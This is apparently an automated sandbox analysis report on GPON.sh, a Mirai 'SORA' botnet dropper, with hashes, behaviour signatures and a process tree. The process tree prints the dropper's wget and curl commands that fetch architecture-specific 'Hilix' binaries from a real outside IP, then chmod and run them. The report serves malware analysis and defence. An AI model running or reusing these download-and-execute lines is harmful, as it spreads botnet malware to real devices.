Overview

overview

10

Static

static

1

GPON.sh

ubuntu-18.04-amd64

10

GPON.sh

debian-9-armhf

10

GPON.sh

debian-9-mips

1

GPON.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    36s
  • max time network
    150s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240418-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    22-02-2025 16:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    GPON.sh

  • Size

    1KB

  • MD5

    5e6b993735e7a9bcafc44479de9ad361

  • SHA1

    646f766fcc739d4e370626ad0cd732955b85bff1

  • SHA256

    cbf92e8a0ac875219802f4e5ffb7177afb36d915c8041337883f4fd1e9497d8a

  • SHA512

    7e344749f5df14e6f8aa8ddb8f2b38438e886b019afcfa3020a505eb9f660e84741fffad3dc31e031b6245ce205737b1f08efc79bf466e51c6d46fcf3dbcaa35

Score
10/10
miraisoraantivmbotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

SORA

Extracted

Family

mirai

Botnet

SORA

Extracted

Family

mirai

Botnet

SORA

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (206872) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 8 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Changes its process name 4 IoCs
  • Checks CPU configuration 1 TTPs 10 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 20 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/GPON.sh
    /tmp/GPON.sh
    1⤵
    • Executes dropped EXE
    • Writes file to tmp directory
    PID:643
    • /usr/bin/wget
      wget http://37.221.67.207/bins/Hilix.x86
      2⤵
      • Writes file to tmp directory
      PID:645
    • /usr/bin/curl
      curl -O http://37.221.67.207/bins/Hilix.x86
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:670
    • /bin/cat
      cat Hilix.x86
      2⤵
        PID:674
      • /bin/chmod
        chmod +x GPON.sh Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z6
        2⤵
        • File and Directory Permissions Modification
        PID:675
      • /tmp/SSH
        ./SSH GPON
        2⤵
          PID:677
        • /usr/bin/wget
          wget http://37.221.67.207/bins/Hilix.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:680
        • /usr/bin/curl
          curl -O http://37.221.67.207/bins/Hilix.mips
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:681
        • /bin/cat
          cat Hilix.mips
          2⤵
          • System Network Configuration Discovery
          PID:688
        • /bin/chmod
          chmod +x GPON.sh Hilix.mips Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z6
          2⤵
          • File and Directory Permissions Modification
          PID:689
        • /tmp/SSH
          ./SSH GPON
          2⤵
            PID:691
          • /usr/bin/wget
            wget http://37.221.67.207/bins/Hilix.mpsl
            2⤵
            • Writes file to tmp directory
            PID:693
          • /usr/bin/curl
            curl -O http://37.221.67.207/bins/Hilix.mpsl
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:701
          • /bin/cat
            cat Hilix.mpsl
            2⤵
              PID:712
            • /bin/chmod
              chmod +x GPON.sh Hilix.mips Hilix.mpsl Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z6
              2⤵
              • File and Directory Permissions Modification
              PID:713
            • /tmp/SSH
              ./SSH GPON
              2⤵
                PID:714
              • /usr/bin/wget
                wget http://37.221.67.207/bins/Hilix.arm4
                2⤵
                  PID:716
                • /usr/bin/curl
                  curl -O http://37.221.67.207/bins/Hilix.arm4
                  2⤵
                  • Checks CPU configuration
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:723
                • /bin/cat
                  cat Hilix.arm4
                  2⤵
                    PID:732
                  • /bin/chmod
                    chmod +x GPON.sh Hilix.arm4 Hilix.mips Hilix.mpsl Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z6
                    2⤵
                    • File and Directory Permissions Modification
                    PID:733
                  • /tmp/SSH
                    ./SSH GPON
                    2⤵
                      PID:735
                    • /usr/bin/wget
                      wget http://37.221.67.207/bins/Hilix.arm5
                      2⤵
                      • Writes file to tmp directory
                      PID:736
                    • /usr/bin/curl
                      curl -O http://37.221.67.207/bins/Hilix.arm5
                      2⤵
                      • Checks CPU configuration
                      • Reads runtime system information
                      • Writes file to tmp directory
                      PID:743
                    • /bin/cat
                      cat Hilix.arm5
                      2⤵
                        PID:744
                      • /bin/chmod
                        chmod +x GPON.sh Hilix.arm4 Hilix.arm5 Hilix.mips Hilix.mpsl Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z6
                        2⤵
                        • File and Directory Permissions Modification
                        PID:745
                      • /tmp/SSH
                        ./SSH GPON
                        2⤵
                          PID:746
                        • /usr/bin/wget
                          wget http://37.221.67.207/bins/Hilix.arm6
                          2⤵
                          • Writes file to tmp directory
                          PID:747
                        • /usr/bin/curl
                          curl -O http://37.221.67.207/bins/Hilix.arm6
                          2⤵
                          • Checks CPU configuration
                          • Reads runtime system information
                          • Writes file to tmp directory
                          PID:769
                        • /bin/cat
                          cat Hilix.arm6
                          2⤵
                            PID:779
                          • /bin/chmod
                            chmod +x GPON.sh Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.mips Hilix.mpsl Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z6
                            2⤵
                            • File and Directory Permissions Modification
                            PID:780
                          • /tmp/SSH
                            ./SSH GPON
                            2⤵
                              PID:781
                            • /usr/bin/wget
                              wget http://37.221.67.207/bins/Hilix.arm7
                              2⤵
                              • Writes file to tmp directory
                              PID:782
                            • /usr/bin/curl
                              curl -O http://37.221.67.207/bins/Hilix.arm7
                              2⤵
                              • Checks CPU configuration
                              • Reads runtime system information
                              • Writes file to tmp directory
                              PID:783
                            • /bin/cat
                              cat Hilix.arm7
                              2⤵
                                PID:784
                              • /bin/chmod
                                chmod +x GPON.sh Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.arm7 Hilix.mips Hilix.mpsl Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z6
                                2⤵
                                • File and Directory Permissions Modification
                                PID:785
                              • /tmp/SSH
                                ./SSH GPON
                                2⤵
                                • Modifies Watchdog functionality
                                • Changes its process name
                                PID:786
                              • /usr/bin/wget
                                wget http://37.221.67.207/bins/Hilix.ppc
                                2⤵
                                • Writes file to tmp directory
                                PID:789
                              • /usr/bin/curl
                                curl -O http://37.221.67.207/bins/Hilix.ppc
                                2⤵
                                • Checks CPU configuration
                                • Reads runtime system information
                                • Writes file to tmp directory
                                PID:792
                              • /bin/chmod
                                chmod +x GPON.sh Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.arm7 Hilix.mips Hilix.mpsl Hilix.ppc Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z6
                                2⤵
                                • File and Directory Permissions Modification
                                PID:794
                              • /tmp/SSH
                                ./SSH GPON
                                2⤵
                                • Modifies Watchdog functionality
                                • Changes its process name
                                PID:795
                              • /usr/bin/wget
                                wget http://37.221.67.207/bins/Hilix.m68k
                                2⤵
                                • Writes file to tmp directory
                                PID:798
                              • /usr/bin/curl
                                curl -O http://37.221.67.207/bins/Hilix.m68k
                                2⤵
                                • Checks CPU configuration
                                • Reads runtime system information
                                • Writes file to tmp directory
                                PID:801
                              • /bin/chmod
                                chmod +x GPON.sh Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.arm7 Hilix.m68k Hilix.mips Hilix.mpsl Hilix.ppc Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z6
                                2⤵
                                • File and Directory Permissions Modification
                                PID:803
                              • /tmp/SSH
                                ./SSH GPON
                                2⤵
                                • Modifies Watchdog functionality
                                • Changes its process name
                                PID:804
                              • /usr/bin/wget
                                wget http://37.221.67.207/bins/Hilix.sh4
                                2⤵
                                • Writes file to tmp directory
                                PID:807
                              • /usr/bin/curl
                                curl -O http://37.221.67.207/bins/Hilix.sh4
                                2⤵
                                • Checks CPU configuration
                                • Reads runtime system information
                                • Writes file to tmp directory
                                PID:810
                              • /bin/chmod
                                chmod +x GPON.sh Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.arm7 Hilix.m68k Hilix.mips Hilix.mpsl Hilix.ppc Hilix.sh4 Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z6
                                2⤵
                                • File and Directory Permissions Modification
                                PID:812
                              • /tmp/SSH
                                ./SSH GPON
                                2⤵
                                • Modifies Watchdog functionality
                                • Changes its process name
                                PID:813

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • /tmp/Hilix.x86
                              Filesize

                              48KB

                              MD5

                              11863d3338efb145179a0f97dce5b8c1

                              SHA1

                              f2e14c388fdab6b68d9632190f0cbf6965c955f5

                              SHA256

                              0621c143e5055a7842daccb78ee3ae12549a089e92a0f350bdade1073b9cce7f

                              SHA512

                              87e7cc3f4aff9b7fc3e705a4c5225ed2368cf48f4a89a168fbde3ec83cd7580c24c48e6568944d104e895e5b725ecff5056f8e20e823242cb5699bcabe699e08

                              Download Submit

                            • /tmp/SSH
                              Filesize

                              71KB

                              MD5

                              200e03d27fc14205a10f0d5a030475d9

                              SHA1

                              188c13983b81ed439c8f0cc12039b465ba6616ca

                              SHA256

                              acd3c8b0b1ca433037786c16fd2445fbf96bc361d95b892504880f96b59c436d

                              SHA512

                              af4e5976ca65a8d00654e762593a952549cbbb3f70c42540f450a6698b36378c09a2d183692a77233e0c78d92b2774ea7a200babfb5839b30c1cf7dfeafb3c89

                              Download Submit

                            • /tmp/SSH
                              Filesize

                              71KB

                              MD5

                              a23bd973e7ff662a50be1d058902f06c

                              SHA1

                              d32254694bcf9a61494f3edd1e0d96dd8866af95

                              SHA256

                              6f4f9d4ee87974712c252118942ab7b2492d016b2655ef0984a8c16aa476dc4e

                              SHA512

                              5ac13beaa13eaa4d363bc5fd9616c694ce453ae1b458735c642c0bb7f54835a80d2254e6fac48a684e3d3f7d472b1c95adf52b3f568799eedaa6ca8aab9096df

                              Download Submit

                            • /tmp/SSH
                              Filesize

                              213B

                              MD5

                              f87005f796675cc42d01d2c2a0980019

                              SHA1

                              f86803abb6a20f74faa7d9a5cef4ad4ff35ed7cf

                              SHA256

                              3da99f8ed6b2499f723f7222634c922c77db0be580762fe1ef49a6933e5dfe7c

                              SHA512

                              2efd306ad26cdc3d521a203482ab104696fa681663e8268fd8b735e53daac7da3a37087bc3fae814c6e341c805e56aff9a0ebdc9c392546f0d23b916c07a8770

                              Download Submit

                            • /tmp/SSH
                              Filesize

                              49KB

                              MD5

                              7dc9ff83da9241b391d19ab5e0c852a2

                              SHA1

                              990d4884a26640801b7c0798f8b370d90069e6c3

                              SHA256

                              e27622cb3fa56e1c36aeade1208b57dac065c386de4ebd1723802d373d300a22

                              SHA512

                              969f54dd3acc3ce702c2ee502044e590c7e8c55b7a9eae52965ef61cb627dbd71e1d083b7e298763a09a83985a2c58d20cf78dcc237586884cc92d613d2aee40

                              Download Submit

                            • /tmp/SSH
                              Filesize

                              128KB

                              MD5

                              e4cfb853d49b335c295f07312a97a0c5

                              SHA1

                              c547b5df2c22728ce8321eb495597b4cc4920c24

                              SHA256

                              2d7685d750cb702de3a39d43429fd51b9391f3b70a1724901b464619cb53ea18

                              SHA512

                              207112452da6f16774817c89e5d47e473396559d03f2885f323fa23cf077d98c6bbbf6a79d3a15f467db8382c56535c3d9befb9386b6d1d7fdf0f3f76efecdae

                              Download Submit